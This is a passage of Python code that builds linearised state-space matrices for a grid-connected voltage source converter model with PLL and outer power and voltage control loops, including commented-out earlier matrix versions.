# Ac = np.array([[cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, cpr.wn*(cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) - cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, 0, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, 0, cpr.wn*(Iq*cpr.Ki_pll*cpr.Lt + (-Iq*cpr.Ki_pll*cpr.Lt - cpr.Ki_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp)/vdc)/cpr.Lt, cpr.Kif*cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*vdc), cpr.Kip*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, -cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*vdc), 0, 0],
# [cpr.wn*(-cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, 0, 0, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, cpr.wn*(-Id*cpr.Ki_pll*cpr.Lt + Id*cpr.Ki_pll*cpr.Lt/vdc)/cpr.Lt, 0, 0, cpr.Kiq*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, cpr.Kpc*cpr.Kpq*cpr.Kq*cpr.wn/(cpr.Lt*vdc), cpr.Kpc*cpr.Kpq*cpr.Kv*cpr.wn/(cpr.Lt*vdc)],
# [cpr.wn*vd/vdc, cpr.wn*vq/vdc, -cpr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [-1, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf*cpr.Kpp, cpr.Kif*cpr.Kpp, cpr.Kip, 0, -cpr.Kpp, 0, 0],
# [0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq*cpr.Kq, cpr.Kpq*cpr.Kv],
# [0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll*cpr.wn, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
# [vd/cpr.Tpm, vq/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0, 0],
# [vq/cpr.Tpm, -vd/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tvm],
# ])
Ac = np.array([[cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, cpr.wn * (
cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) - cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0, 0, cpr.wn * (Iq * cpr.Ki_pll * cpr.Lt + (
-Iq * cpr.Ki_pll * cpr.Lt - cpr.Ki_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp) / vdc) / cpr.Lt,
cpr.Kif * cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * vdc), cpr.Kip * cpr.Kpc * cpr.wn / (cpr.Lt * vdc),
0, -cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * vdc), 0, 0],
[cpr.wn * (-cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt,
cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, 0, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn * (-Id * cpr.Ki_pll * cpr.Lt + Id * cpr.Ki_pll * cpr.Lt / vdc) / cpr.Lt, 0, 0,
cpr.Kiq * cpr.Kpc * cpr.wn / (cpr.Lt * vdc), 0,
cpr.Kpc * cpr.Kpq * cpr.Kq * cpr.wn / (cpr.Lt * vdc),
cpr.Kpc * cpr.Kpq * cpr.Kv * cpr.wn / (cpr.Lt * vdc)],
[cpr.wn * vd / (cpr.Ldc * vdc), cpr.wn * vq / (cpr.Ldc * vdc), -cpr.wn / cpr.Ldc, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf * cpr.Kpp, cpr.Kif * cpr.Kpp, cpr.Kip, 0, -cpr.Kpp,
0, 0],
[0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq * cpr.Kq, cpr.Kpq * cpr.Kv],
[0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll * cpr.wn, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
[vd / cpr.Tpm, vq / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0, 0],
[vq / cpr.Tpm, -vd / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tvm],
])
# Bvc = np.array([[-cpr.wn/cpr.Lt, -cpr.Kp_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp*cpr.wn/cpr.Lt],
# [0, -cpr.wn/cpr.Lt],
# [0, -cpr.Kp_pll*cpr.Kpf*cpr.Kpp],
# [0, 0],
# [1/cpr.Tad, 0],
# [0, 1/cpr.Tad],
# [0, cpr.Kp_pll*cpr.wn],
# [0, 1],
# [0, -cpr.Kp_pll],
# [0, -cpr.Kp_pll*cpr.Kpf],
# [0, 0],
# [Id/cpr.Tpm, Iq/cpr.Tpm],
# [-Iq/cpr.Tpm, Id/cpr.Tpm],
# [vd/(cpr.Tvm*np.sqrt(vd**2 + vq**2)), vq/(cpr.Tvm*np.sqrt(vd**2 + vq**2))],
# ])
# Bvc = np.array([[-cpr.wn/cpr.Lt, cpr.wn*(Iq*cpr.Kp_pll*cpr.Lt + (-Iq*cpr.Kp_pll*cpr.Lt - cpr.Kp_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp)/vdc)/cpr.Lt],
# [0, cpr.wn*(-Id*cpr.Kp_pll*cpr.Lt + Id*cpr.Kp_pll*cpr.Lt/vdc - 1)/cpr.Lt],
# [Id*cpr.wn/vdc, Iq*cpr.wn/vdc],
# [0, -cpr.Kp_pll*cpr.Kpf*cpr.Kpp],
# [0, 0],
# [1/cpr.Tad, 0],
# [0, 1/cpr.Tad],
# [0, cpr.Kp_pll*cpr.wn],
# [0, 1],
# [0, -cpr.Kp_pll],
# [0, -cpr.Kp_pll*cpr.Kpf],
# [0, 0],
# [Id/cpr.Tpm, Iq/cpr.Tpm],
# [-Iq/cpr.Tpm, Id/cpr.Tpm],
# [vd/(cpr.Tvm*np.sqrt(vd**2 + vq**2)), vq/(cpr.Tvm*np.sqrt(vd**2 + vq**2))],
# ])
Bvc = np.array([[-cpr.wn / cpr.Lt, cpr.wn * (Iq * cpr.Kp_pll * cpr.Lt + (
-Iq * cpr.Kp_pll * cpr.Lt - cpr.Kp_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp) / vdc) / cpr.Lt],
[0, cpr.wn * (-Id * cpr.Kp_pll * cpr.Lt + Id * cpr.Kp_pll * cpr.Lt / vdc - 1) / cpr.Lt],
[Id * cpr.wn / (cpr.Ldc * vdc), Iq * cpr.wn / (cpr.Ldc * vdc)],
[0, -cpr.Kp_pll * cpr.Kpf * cpr.Kpp],
[0, 0],
[1 / cpr.Tad, 0],
[0, 1 / cpr.Tad],
[0, cpr.Kp_pll * cpr.wn],
[0, 1],
[0, -cpr.Kp_pll],
[0, -cpr.Kp_pll * cpr.Kpf],
[0, 0],
[Id / cpr.Tpm, Iq / cpr.Tpm],
[-Iq / cpr.Tpm, Id / cpr.Tpm],
[vd / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2)), vq / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2))],
])
Tc = np.array([[np.cos(theta), np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
Rvc = np.zeros((2, cpr.nx))
Rvc[0, cpr.x_idx['Theta']] = vq
Rvc[1, cpr.x_idx['Theta']] = -vd
Pc = np.zeros((2, cpr.nx))
Pc[0, cpr.x_idx['Id']] = 1
Pc[1, cpr.x_idx['Iq']] = 1
Pc[0, cpr.x_idx['Theta']] = -Iq
Pc[1, cpr.x_idx['Theta']] = Id
Cc = Tc.T @ Pc
Dc = np.zeros((2, 2))
A = Ac + Bvc @ Rvc
B = Bvc @ Tc
C = Cc * cpr.Sn / cpr.Sb
D = Dc
return A, B, C, D
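# Editorial note, inferred from the structure above (applies to the other
# *_linear functions as well): Tc is the rotation between the converter dq
# frame and the network frame, Rvc holds the sensitivity of the rotated
# voltage to the PLL angle ([vq, -vd] at the 'Theta' state), so
# A = Ac + Bvc @ Rvc closes the voltage-angle feedback into the state
# matrix, while B = Bvc @ Tc maps network-frame voltage inputs into dq.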
def c_linear0(x0, u0, cpr):
Id = x0[cpr.x_idx['Id']]
Iq = x0[cpr.x_idx['Iq']]
theta = x0[cpr.x_idx['Theta']]
vd = u0[0]
vq = u0[1]
Ac0 = np.array([[cpr.wn * (-cpr.Kpc - cpr.Rt) / cpr.Lt, 0, cpr.Kic * cpr.wn / cpr.Lt, 0, cpr.wn / cpr.Lt, 0, 0,
-cpr.Ki_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp * cpr.wn / cpr.Lt,
cpr.Kif * cpr.Kpc * cpr.Kpp * cpr.wn / cpr.Lt, cpr.Kip * cpr.Kpc * cpr.wn / cpr.Lt, 0,
-cpr.Kpc * cpr.Kpp * cpr.wn / cpr.Lt, 0, 0],
[0, cpr.wn * (-cpr.Kpc - cpr.Rt) / cpr.Lt, 0, cpr.Kic * cpr.wn / cpr.Lt, 0, cpr.wn / cpr.Lt, 0, 0,
0, 0, cpr.Kiq * cpr.Kpc * cpr.wn / cpr.Lt, 0, cpr.Kpc * cpr.Kpq * cpr.Kq * cpr.wn / cpr.Lt,
cpr.Kpc * cpr.Kpq * cpr.Kv * cpr.wn / cpr.Lt],
[-1, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf * cpr.Kpp, cpr.Kif * cpr.Kpp, cpr.Kip, 0, -cpr.Kpp, 0,
0],
[0, -1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq * cpr.Kq, cpr.Kpq * cpr.Kv],
[0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll * cpr.wn, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
[vd / cpr.Tpm, vq / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0, 0],
[vq / cpr.Tpm, -vd / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tvm],
])
Bvc0 = np.array([[-cpr.wn / cpr.Lt, -cpr.Kp_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp * cpr.wn / cpr.Lt],
[0, -cpr.wn / cpr.Lt],
[0, -cpr.Kp_pll * cpr.Kpf * cpr.Kpp],
[0, 0],
[1 / cpr.Tad, 0],
[0, 1 / cpr.Tad],
[0, cpr.Kp_pll * cpr.wn],
[0, 1],
[0, -cpr.Kp_pll],
[0, -cpr.Kp_pll * cpr.Kpf],
[0, 0],
[Id / cpr.Tpm, Iq / cpr.Tpm],
[-Iq / cpr.Tpm, Id / cpr.Tpm],
[vd / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2)), vq / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2))],
])
Tc0 = np.array([[np.cos(theta), np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
Rvc0 = np.zeros((2, cpr.nx))
Rvc0[0, cpr.x_idx['Theta']] = vq
Rvc0[1, cpr.x_idx['Theta']] = -vd
Pc0 = np.zeros((2, cpr.nx))
Pc0[0, cpr.x_idx['Id']] = 1
Pc0[1, cpr.x_idx['Iq']] = 1
Pc0[0, cpr.x_idx['Theta']] = -Iq
Pc0[1, cpr.x_idx['Theta']] = Id
Cc0 = Tc0.T @ Pc0
Dc0 = np.zeros((2, 2))
A0 = Ac0 + Bvc0 @ Rvc0
B0 = Bvc0 @ Tc0
C0 = Cc0 * cpr.Sn / cpr.Sb
D0 = Dc0
return A0, B0, C0, D0
def vsc_linear_1(xo, uo, cpr):
Id = xo[cpr.x_idx['Id']]
Iq = xo[cpr.x_idx['Iq']]
theta = xo[cpr.x_idx['Theta']]
Xpll = xo[cpr.x_idx['Xpll']]
Madd = xo[cpr.x_idx['Madd']]
Madq = xo[cpr.x_idx['Madq']]
Md = xo[cpr.x_idx['Md']]
Mq = xo[cpr.x_idx['Mq']]
Xp = xo[cpr.x_idx['Xp']]
Xq = xo[cpr.x_idx['Xq']]
Xf = xo[cpr.x_idx['Xf']]
Pm = xo[cpr.x_idx['Pm']]
Qm = xo[cpr.x_idx['Qm']]
Vm = xo[cpr.x_idx['Vm']]
vd = uo[0]
vq = uo[1]
vdc = uo[2]
# Ac = np.array([[cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, cpr.wn*(cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) - cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, 0, cpr.wn*(Iq*cpr.Ki_pll*cpr.Lt + (-Iq*cpr.Ki_pll*cpr.Lt - cpr.Ki_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp)/vdc)/cpr.Lt, cpr.Kif*cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*vdc), cpr.Kip*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, -cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*vdc), 0, 0],
# [cpr.wn*(-cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, 0, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, cpr.wn*(-Id*cpr.Ki_pll*cpr.Lt + Id*cpr.Ki_pll*cpr.Lt/vdc)/cpr.Lt, 0, 0, cpr.Kiq*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, cpr.Kpc*cpr.Kpq*cpr.Kq*cpr.wn/(cpr.Lt*vdc), cpr.Kpc*cpr.Kpq*cpr.Kv*cpr.wn/(cpr.Lt*vdc)],
# [-1, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf*cpr.Kpp, cpr.Kif*cpr.Kpp, cpr.Kip, 0, -cpr.Kpp, 0, 0],
# [0, -1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq*cpr.Kq, cpr.Kpq*cpr.Kv],
# [0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll*cpr.wn, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll*cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
# [vd/cpr.Tpm, vq/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0, 0],
# [vq/cpr.Tpm, -vd/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tvm],
# ])
Ac = np.array([[cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, cpr.wn * (
cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) - cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0, 0, cpr.wn * (Iq * cpr.Ki_pll * cpr.Lt + (
-Iq * cpr.Ki_pll * cpr.Lt - cpr.Ki_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp) / vdc) / cpr.Lt,
cpr.Kif * cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * vdc), cpr.Kip * cpr.Kpc * cpr.wn / (cpr.Lt * vdc),
0, -cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * vdc), 0, 0],
[cpr.wn * (-cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt,
cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, 0, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn * (-Id * cpr.Ki_pll * cpr.Lt + Id * cpr.Ki_pll * cpr.Lt / vdc) / cpr.Lt, 0, 0,
cpr.Kiq * cpr.Kpc * cpr.wn / (cpr.Lt * vdc), 0,
cpr.Kpc * cpr.Kpq * cpr.Kq * cpr.wn / (cpr.Lt * vdc),
cpr.Kpc * cpr.Kpq * cpr.Kv * cpr.wn / (cpr.Lt * vdc)],
[cpr.wn * vd / (cpr.Ldc * vdc), cpr.wn * vq / (cpr.Ldc * vdc), -cpr.wn / cpr.Ldc, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf * cpr.Kpp, cpr.Kif * cpr.Kpp, cpr.Kip, 0, -cpr.Kpp,
0, 0],
[0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq * cpr.Kq, cpr.Kpq * cpr.Kv],
[0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll * cpr.wn, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll * cpr.Kpf, cpr.Kif, 0, 0, -1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kq, cpr.Kv],
[vd / cpr.Tpm, vq / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0, 0],
[vq / cpr.Tpm, -vd / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tvm],
])
# Bvc = np.array([[-cpr.wn/cpr.Lt, cpr.wn*(Iq*cpr.Kp_pll*cpr.Lt + (-Iq*cpr.Kp_pll*cpr.Lt - cpr.Kp_pll*cpr.Kpc*cpr.Kpf*cpr.Kpp)/vdc)/cpr.Lt, -cpr.wn*(-Iq*cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + Madd + Md*cpr.Kic + cpr.Kpc*(-Id + Xp*cpr.Kip + cpr.Kpp*(-Pm + Xf*cpr.Kif + cpr.Kpf*(-Xpll*cpr.Ki_pll - cpr.Kp_pll*vq + 1) + cpr.Pref)))/(cpr.Lt*vdc**2)],
# [0, cpr.wn*(-Id*cpr.Kp_pll*cpr.Lt + Id*cpr.Kp_pll*cpr.Lt/vdc - 1)/cpr.Lt, -cpr.wn*(Id*cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + Madq + Mq*cpr.Kic + cpr.Kpc*(-Iq + Xq*cpr.Kiq + cpr.Kpq*(cpr.Kq*(Qm - cpr.Qref) + cpr.Kv*(Vm - cpr.Vref))))/(cpr.Lt*vdc**2)],
# [0, -cpr.Kp_pll*cpr.Kpf*cpr.Kpp, 0],
# [0, 0, 0],
# [1/cpr.Tad, 0, 0],
# [0, 1/cpr.Tad, 0],
# [0, cpr.Kp_pll*cpr.wn, 0],
# [0, 1, 0],
# [0, -cpr.Kp_pll, 0],
# [0, -cpr.Kp_pll*cpr.Kpf, 0],
# [0, 0, 0],
# [Id/cpr.Tpm, Iq/cpr.Tpm, 0],
# [-Iq/cpr.Tpm, Id/cpr.Tpm, 0],
# [vd/(cpr.Tvm*np.sqrt(vd**2 + vq**2)), vq/(cpr.Tvm*np.sqrt(vd**2 + vq**2)), 0],
# ])
Bvac = np.array([[-cpr.wn / cpr.Lt, cpr.wn * (Iq * cpr.Kp_pll * cpr.Lt + (
-Iq * cpr.Kp_pll * cpr.Lt - cpr.Kp_pll * cpr.Kpc * cpr.Kpf * cpr.Kpp) / vdc) / cpr.Lt],
[0, cpr.wn * (-Id * cpr.Kp_pll * cpr.Lt + Id * cpr.Kp_pll * cpr.Lt / vdc - 1) / cpr.Lt],
[Id * cpr.wn / (cpr.Ldc * vdc), Iq * cpr.wn / (cpr.Ldc * vdc)],
[0, -cpr.Kp_pll * cpr.Kpf * cpr.Kpp],
[0, 0],
[1 / cpr.Tad, 0],
[0, 1 / cpr.Tad],
[0, cpr.Kp_pll * cpr.wn],
[0, 1],
[0, -cpr.Kp_pll],
[0, -cpr.Kp_pll * cpr.Kpf],
[0, 0],
[Id / cpr.Tpm, Iq / cpr.Tpm],
[-Iq / cpr.Tpm, Id / cpr.Tpm],
[vd / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2)), vq / (cpr.Tvm * np.sqrt(vd ** 2 + vq ** 2))],
])
Bvdc = np.array([[-cpr.wn * (
-Iq * cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + Madd + Md * cpr.Kic + cpr.Kpc * (
-Id + Xp * cpr.Kip + cpr.Kpp * (
-Pm + Xf * cpr.Kif + cpr.Kpf * (-Xpll * cpr.Ki_pll - cpr.Kp_pll * vq + 1) + cpr.Pref))) / (
cpr.Lt * vdc ** 2)],
[-cpr.wn * (Id * cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + Madq + Mq * cpr.Kic + cpr.Kpc * (
-Iq + Xq * cpr.Kiq + cpr.Kpq * (
cpr.Kq * (Qm - cpr.Qref) + cpr.Kv * (Vm - cpr.Vref)))) / (cpr.Lt * vdc ** 2)],
[-cpr.wn * (Id * vd + Iq * vq) / (cpr.Ldc * vdc ** 2)],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
])
Tc = np.array([[np.cos(theta), np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
Rvc = np.zeros((2, cpr.nx))
Rvc[0, cpr.x_idx['Theta']] = vq
Rvc[1, cpr.x_idx['Theta']] = -vd
Pc = np.zeros((2, cpr.nx))
Pc[0, cpr.x_idx['Id']] = 1
Pc[1, cpr.x_idx['Iq']] = 1
Pc[0, cpr.x_idx['Theta']] = -Iq
Pc[1, cpr.x_idx['Theta']] = Id
Cc = Tc.T @ Pc
Cdc = np.zeros((1, cpr.nx))
Cdc[0, cpr.x_idx['Idc']] = 1
Dc = np.zeros((2, 2))
A = Ac + Bvac @ Rvc
B = Bvac @ Tc
C = Cc * cpr.Sn / cpr.Sb
D = Dc
return A, B, Bvdc, C, Cdc, D
def vsc_linear_2(x0, u0, cpr):
Id = x0[cpr.x_idx['Id']]
Iq = x0[cpr.x_idx['Iq']]
theta = x0[cpr.x_idx['Theta']]
Xpll = x0[cpr.x_idx['Xpll']]
Madd = x0[cpr.x_idx['Madd']]
Madq = x0[cpr.x_idx['Madq']]
Md = x0[cpr.x_idx['Md']]
Mq = x0[cpr.x_idx['Mq']]
Xp = x0[cpr.x_idx['Xp']]
Xq = x0[cpr.x_idx['Xq']]
Qm = x0[cpr.x_idx['Qm']]
Vm = x0[cpr.x_idx['Vm']]
vd = u0[0]
vq = u0[1]
vdc = u0[2]
# Ac = np.array([[cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, cpr.wn*(cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) - cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, 0, cpr.wn*(Iq*cpr.Ki_pll*cpr.Lt - Iq*cpr.Ki_pll*cpr.Lt/vdc)/cpr.Lt, 0, cpr.Kip*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, 0, 0, cpr.Kpc*cpr.Kpp*cpr.wn/(cpr.Lt*cpr.Vref*vdc)],
# [cpr.wn*(-cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq)/vdc)/cpr.Lt, cpr.wn*(-cpr.Kpc/vdc - cpr.Rt)/cpr.Lt, 0, cpr.Kic*cpr.wn/(cpr.Lt*vdc), 0, cpr.wn/(cpr.Lt*vdc), 0, cpr.wn*(-Id*cpr.Ki_pll*cpr.Lt + Id*cpr.Ki_pll*cpr.Lt/vdc)/cpr.Lt, 0, 0, cpr.Kiq*cpr.Kpc*cpr.wn/(cpr.Lt*vdc), 0, cpr.Kpc*cpr.Kpq*cpr.wn/(cpr.Lt*vdc), 0],
# [-1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kip, 0, 0, 0, cpr.Kpp/cpr.Vref],
# [0, -1, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq, 0],
# [0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, -1/cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll*cpr.wn, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
